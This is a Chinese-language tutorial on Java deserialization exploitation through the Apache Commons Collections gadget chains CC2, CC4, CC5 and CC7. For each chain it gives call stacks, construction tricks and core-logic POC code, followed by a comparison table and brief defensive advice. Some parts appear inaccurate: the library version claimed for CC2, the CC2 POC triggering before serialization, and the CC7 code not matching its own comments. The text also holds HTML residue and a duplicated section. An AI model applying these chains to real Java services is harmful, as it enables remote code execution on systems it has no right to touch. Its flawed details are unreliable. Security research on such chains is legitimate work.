Apache Commons Collections 反序列化漏洞利用链（CC2\/CC4\/CC5\/CC7）深入解析<\/h2>

文档说明<\/h3>

目标读者<\/strong>：已具备Java反序列化基础知识，了解CC1和CC3利用链的安全研究人员、渗透测试人员及Java开发者。
教学目的<\/strong>：深入理解CC2、CC4、CC5、CC7利用链的触发起点、核心组件、构造技巧及差异点，掌握漏洞挖掘与防御方法。
环境依赖<\/strong>：<\/p>

Commons Collections 4.0 (用于CC4)<\/li>
Commons Collections 3.1 (用于CC2, CC5, CC7)<\/li>
JDK 8u65 或类似版本（需低于JDK 8u71以避开sun.reflect.annotation.AnnotationInvocationHandler<\/code>的修复）<\/li> <\/ul> 第一章：CC4 利用链分析<\/h3> CC4是CC2与CC3的“结合体”，它主要在Commons Collections 4.0版本中利用PriorityQueue<\/code>和TransformingComparator<\/code>来触发执行。<\/p> 1.1 核心组件<\/h4> 触发类<\/strong>: java.util.PriorityQueue<\/code> 该类在反序列化时会调用readObject<\/code>方法，并执行heapify()<\/code>来重建堆结构。<\/li> <\/ul> <\/li> 比较器<\/strong>: org.apache.commons.collections4.comparators.TransformingComparator<\/code> 在比较时调用其compare<\/code>方法，进而调用内部Transformer<\/code>的transform<\/code>方法。<\/li> <\/ul> <\/li> Transformer链<\/strong>: org.apache.commons.collections4.functors.ChainedTransformer<\/code> 用于将多个Transformer连接起来，按顺序执行。<\/li> <\/ul> <\/li> 代码执行器<\/strong>: org.apache.commons.collections4.functors.InstantiateTransformer<\/code> 通过反射实例化对象，结合TemplatesImpl<\/code>实现字节码加载。<\/li> <\/ul> <\/li> <\/ul> 1.2 利用链调用栈<\/h4> PriorityQueue.readObject() -> heapify() -> siftDown() -> siftDownUsingComparator() -> comparator.compare() \/\/ TransformingComparator.compare() -> this.transformer.transform() \/\/ ChainedTransformer.transform() -> InstantiateTransformer.transform() \/\/ 触发TemplatesImpl.newTransformer() -> ... \/\/ 后续同CC3，执行恶意字节码 <\/code><\/pre> 1.3 构造过程与关键点<\/h4> 构造恶意TemplatesImpl<\/strong>：与CC3完全相同，通过反射设置_name<\/code>、_bytecodes<\/code>等字段，加载恶意类字节码。<\/li> 构造ChainedTransformer<\/strong>： Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span> \/\/ 传入目标类 <\/span><\/span><\/span><\/span> new<\/span> InstantiateTransformer(<\/span>new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>templates})<\/span> \/\/ 实例化TrAXFilter，其构造函数会调用TemplatesImpl.newTransformer() <\/span><\/span><\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span><\/code><\/pre><\/li> 设置TransformingComparator<\/strong>： TransformingComparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>chain);<\/span> <\/span><\/span><\/code><\/pre><\/li> 配置PriorityQueue<\/strong>：关键问题：在add<\/code>元素时就会调用compare<\/code>，导致序列化前就触发代码执行。<\/li> 解决方案（惰性赋值）<\/strong>：先用一个无害的Transformer（如new ConstantTransformer(1)<\/code>）初始化TransformingComparator<\/code>。<\/li> 通过priorityQueue.add(1); priorityQueue.add(2);<\/code>添加两个元素，确保队列有足够大小（size>=2）以使heapify<\/code>中的循环(size >>> 1) - 1<\/code>能执行。<\/li> 在添加元素后，再通过反射将TransformingComparator<\/code>内部的transformer<\/code>字段替换为恶意的ChainedTransformer<\/code>。<\/li> <\/ul> <\/li> <\/ul> \/\/ 先使用无害Transformer <\/span><\/span><\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span> <\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>comparator);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 通过反射替换为恶意Transformer <\/span><\/span><\/span><\/span>Field transformerField =<\/span> TransformingComparator.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"transformer"<\/span>);<\/span> <\/span><\/span>transformerField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>transformerField.<\/span>set<\/span>(<\/span>comparator,<\/span> chain);<\/span> \/\/ 替换为恶意的chain <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 1.4 完整POC代码（核心逻辑）<\/h4> \/\/ 1. 构造TemplatesImpl（同CC3） <\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> ...;<\/span> <\/span><\/span>\/\/ 2. 构造Transformer链 <\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InstantiateTransformer(<\/span>new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>templates})<\/span> <\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span>\/\/ 3. 构造Comparator并设置PriorityQueue（使用惰性赋值） <\/span><\/span><\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span> <\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>comparator);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span> <\/span><\/span>\/\/ 4. 反射替换Transformer <\/span><\/span><\/span><\/span>Field transformerField =<\/span> TransformingComparator.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"transformer"<\/span>);<\/span> <\/span><\/span>transformerField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>transformerField.<\/span>set<\/span>(<\/span>comparator,<\/span> chain);<\/span> <\/span><\/span>\/\/ 5. 序列化\/反序列化触发 <\/span><\/span><\/span><\/span>serialize(<\/span>queue);<\/span> <\/span><\/span>unserialize(<\/span>"ser.bin"<\/span>);<\/span> <\/span><\/span><\/code><\/pre> 第二章：CC2 利用链分析<\/h3> CC2利用java.util.PriorityQueue<\/code>和org.apache.commons.collections4.comparators.TransformingComparator<\/code>，但代码执行方式不同。<\/p> 2.1 与CC4的区别<\/h4> Commons Collections版本<\/strong>：CC2使用3.1版本，因此包路径为org.apache.commons.collections.functors<\/code>和org.apache.commons.collections.comparators<\/code>。<\/li> 代码执行方式<\/strong>：CC2利用InvokerTransformer<\/code>直接调用TemplatesImpl<\/code>的newTransformer<\/code>方法，而非InstantiateTransformer<\/code>。<\/li> <\/ul> 2.2 利用链调用栈<\/h4> PriorityQueue.readObject() -> heapify() -> siftDown() -> siftDownUsingComparator() -> comparator.compare() \/\/ TransformingComparator.compare() -> this.transformer.transform() \/\/ ChainedTransformer.transform() -> InvokerTransformer.transform() \/\/ 反射调用TemplatesImpl.newTransformer() -> TemplatesImpl.newTransformer() \/\/ 触发恶意字节码执行 <\/code><\/pre> 2.3 完整POC（核心逻辑）<\/h4> TemplatesImpl templates =<\/span> ...;<\/span> \/\/ 构造同CC3 <\/span><\/span><\/span><\/span> <\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>templates),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span> \/\/ 直接调用newTransformer方法 <\/span><\/span><\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>chain);<\/span> <\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>comparator);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 序列化\/反序列化触发 <\/span><\/span><\/span><\/code><\/pre> 第三章：CC5 利用链分析<\/h3> CC5通过BadAttributeValueExpException<\/code>的readObject<\/code>方法触发TiedMapEntry<\/code>的getValue<\/code>，进而触发LazyMap.get<\/code>。<\/p> 3.1 核心组件<\/h4> 触发类<\/strong>: javax.management.BadAttributeValueExpException<\/code> 反序列化时直接调用this.val.toString()<\/code>。<\/li> <\/ul> <\/li> 桥梁类<\/strong>: org.apache.commons.collections.keyvalue.TiedMapEntry<\/code> 其toString<\/code>方法调用getValue()<\/code>，进而调用this.map.get(this.key)<\/code>。<\/li> <\/ul> <\/li> 触发Map<\/strong>: org.apache.commons.collections.map.LazyMap<\/code> 当get<\/code>方法找不到key时，会调用this.factory.transform()<\/code>。<\/li> <\/ul> <\/li> <\/ul> 3.2 利用链调用栈<\/h4> BadAttributeValueExpException.readObject() -> val.toString() \/\/ TiedMapEntry.toString() -> this.getValue() \/\/ TiedMapEntry.getValue() -> this.map.get() \/\/ LazyMap.get() -> this.factory.transform() \/\/ ChainedTransformer.transform() -> ... \/\/ 后续Transformer链执行 <\/code><\/pre> 3.3 构造关键点<\/h4> 需要设置BadAttributeValueExpException<\/code>的val<\/code>字段为TiedMapEntry<\/code>实例。<\/li> TiedMapEntry<\/code>的map<\/code>需为LazyMap<\/code>，且其factory<\/code>为恶意的ChainedTransformer<\/code>。<\/li> 需通过反射设置LazyMap<\/code>的factory<\/code>，避免在构造时触发。<\/li> <\/ul> 3.4 POC代码（核心逻辑）<\/h4> Transformer[]<\/span> transformers =<\/span> ...;<\/span> \/\/ 构造Transformer链（如CC1） <\/span><\/span><\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span>Map innerMap =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> chain);<\/span> \/\/ 设置LazyMap的factory为chain <\/span><\/span><\/span><\/span> <\/span><\/span>TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "foo"<\/span>);<\/span> \/\/ key为"foo"，确保LazyMap.get()触发transform <\/span><\/span><\/span><\/span> <\/span><\/span>BadAttributeValueExpException bad =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span> <\/span><\/span>Field valField =<\/span> BadAttributeValueExpException.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span> <\/span><\/span>valField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>valField.<\/span>set<\/span>(<\/span>bad,<\/span> entry);<\/span> \/\/ 通过反射设置val字段，避免构造函数检查 <\/span><\/span><\/span><\/code><\/pre> 第四章：CC7 利用链分析<\/h3> CC7利用Hashtable<\/code>的反序列化机制，通过其reconstitutionPut<\/code>方法触发AbstractMap.equals<\/code>，进而触发LazyMap.get<\/code>。<\/p> 4.1 核心组件<\/h4> 触发类<\/strong>: java.util.Hashtable<\/code> 反序列化时对每个键值对执行reconstitutionPut<\/code>，会调用key.equals()<\/code>。<\/li> <\/ul> <\/li> 桥梁类<\/strong>: org.apache.commons.collections.map.AbstractMapDecorator<\/code> 其equals<\/code>方法会调用this.map.equals()<\/code>，进而触发LazyMap.get<\/code>。<\/li> <\/ul> <\/li> <\/ul> 4.2 利用链调用栈<\/h4> Hashtable.readObject() -> reconstitutionPut() -> key.equals() \/\/ AbstractMapDecorator.equals() -> this.map.equals() \/\/ LazyMap.equals() -> this.get() \/\/ 在equals比较过程中触发LazyMap.get() -> this.factory.transform() \/\/ ChainedTransformer.transform() -> ... \/\/ 执行恶意代码 <\/code><\/pre> 4.3 构造过程<\/h4> 创建两个LazyMap<\/code>实例（map1, map2），其factory<\/code>为恶意ChainedTransformer<\/code>。<\/li> 创建两个AbstractMapDecorator<\/code>（或直接使用LazyMap<\/code>）作为key，分别放入两个Hashtable<\/code>。<\/li> 通过反射交换两个LazyMap<\/code>的key，使equals<\/code>比较时触发get<\/code>。<\/li> <\/ol> 4.4 完整POC（核心逻辑）<\/h4> Transformer[]<\/span> transformers =<\/span> ...;<\/span> \/\/ 构造Transformer链 <\/span><\/span><\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> <\/span><\/span>Map innerMap1 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>Map innerMap2 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>Map lazyMap1 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap1,<\/span> chain);<\/span> <\/span><\/span>Map lazyMap2 =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap2,<\/span> chain);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置两个不同的key <\/span><\/span><\/span><\/span>lazyMap1.<\/span>put<\/span>(<\/span>"yy"<\/span>,<\/span> 1<\/span>);<\/span> <\/span><\/span>lazyMap2.<\/span>put<\/span>(<\/span>"zZ"<\/span>,<\/span> 1<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 创建Hashtable并添加键值对 <\/span><\/span><\/span><\/span>Hashtable hashtable =<\/span> new<\/span> Hashtable();<\/span> <\/span><\/span>hashtable.<\/span>put<\/span>(<\/span>lazyMap1,<\/span> "test"<\/span>);<\/span> <\/span><\/span>hashtable.<\/span>put<\/span>(<\/span>lazyMap2,<\/span> "test"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 通过反射交换两个LazyMap的key，使equals时触发get <\/span><\/span><\/span><\/span>Field factoryField =<\/span> LazyMap.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span> <\/span><\/span>factoryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>factoryField.<\/span>set<\/span>(<\/span>lazyMap1,<\/span> chain);<\/span> \/\/ 确保factory已设置 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 序列化\/反序列化触发 <\/span><\/span><\/span><\/code><\/pre> 第五章：总结与对比<\/h3> 利用链<\/th> 触发类<\/th> 关键Transformer<\/th> 版本<\/th> 特点<\/th> <\/tr> <\/thead> CC2<\/td> PriorityQueue<\/td> InvokerTransformer<\/td> CC 3.1<\/td> 直接反射调用，简洁高效<\/td> <\/tr> CC4<\/td> PriorityQueue<\/td> InstantiateTransformer<\/td> CC 4.0<\/td> 结合CC3的字节码加载方式<\/td> <\/tr> CC5<\/td> BadAttributeValueExpException<\/td> LazyMap + ChainedTransformer<\/td> CC 3.1<\/td> 利用异常类触发，依赖较少<\/td> <\/tr> CC7<\/td> Hashtable<\/td> LazyMap + ChainedTransformer<\/td> CC 3.1<\/td> 通过Map的equals方法触发，构造复杂<\/td> <\/tr> <\/tbody> <\/table> 防御建议<\/h4> 升级Commons Collections<\/strong>：使用最新版本（如4.4+），其中已修复这些反序列化问题。<\/li> 全局反序列化过滤<\/strong>：使用ObjectInputFilter<\/code>设置白名单，限制反序列化的类。<\/li> 代码安全审计<\/strong>：检查所有反序列化入口点，避免不可信数据流入。<\/li> <\/ol> 以上即为CC2、CC4、CC5、CC7利用链的完整教学文档。重点在于理解每条链的触发起点、核心组件的串联方式以及构造时的关键技巧（如惰性赋值、反射修改字段等）。<\/p>

Apache Commons Collections 反序列化漏洞利用链（CC2\/CC4\/CC5\/CC7）深入解析<\/h2>

第一章：CC4 利用链分析<\/h3>
CC4是CC2与CC3的“结合体”，它主要在Commons Collections 4.0版本中利用`PriorityQueue<\/code>和TransformingComparator<\/code>来触发执行。<\/p>`

第二章：CC2 利用链分析<\/h3>
CC2利用`java.util.PriorityQueue<\/code>和org.apache.commons.collections4.comparators.TransformingComparator<\/code>，但代码执行方式不同。<\/p>`

第三章：CC5 利用链分析<\/h3>
CC5通过`BadAttributeValueExpException<\/code>的readObject<\/code>方法触发TiedMapEntry<\/code>的getValue<\/code>，进而触发LazyMap.get<\/code>。<\/p>`

第四章：CC7 利用链分析<\/h3>
CC7利用`Hashtable<\/code>的反序列化机制，通过其reconstitutionPut<\/code>方法触发AbstractMap.equals<\/code>，进而触发LazyMap.get<\/code>。<\/p>`

利用链<\/th>	触发类<\/th>	关键Transformer<\/th>	版本<\/th>	特点<\/th> <\/tr> <\/thead>
CC2<\/td>	PriorityQueue<\/td>	InvokerTransformer<\/td>	CC 3.1<\/td>	直接反射调用，简洁高效<\/td> <\/tr>
CC4<\/td>	PriorityQueue<\/td>	InstantiateTransformer<\/td>	CC 4.0<\/td>	结合CC3的字节码加载方式<\/td> <\/tr>
CC5<\/td>	BadAttributeValueExpException<\/td>	LazyMap + ChainedTransformer<\/td>	CC 3.1<\/td>	利用异常类触发，依赖较少<\/td> <\/tr>
CC7<\/td>	Hashtable<\/td>	LazyMap + ChainedTransformer<\/td>	CC 3.1<\/td>	通过Map的equals方法触发，构造复杂<\/td> <\/tr> <\/tbody> <\/table> 防御建议<\/h4> 升级Commons Collections<\/strong>：使用最新版本（如4.4+），其中已修复这些反序列化问题。<\/li> 全局反序列化过滤<\/strong>：使用`ObjectInputFilter<\/code>设置白名单，限制反序列化的类。<\/li>` `代码安全审计<\/strong>：检查所有反序列化入口点，避免不可信数据流入。<\/li> <\/ol> 以上即为CC2、CC4、CC5、CC7利用链的完整教学文档。重点在于理解每条链的触发起点、核心组件的串联方式以及构造时的关键技巧（如惰性赋值、反射修改字段等）。<\/p>`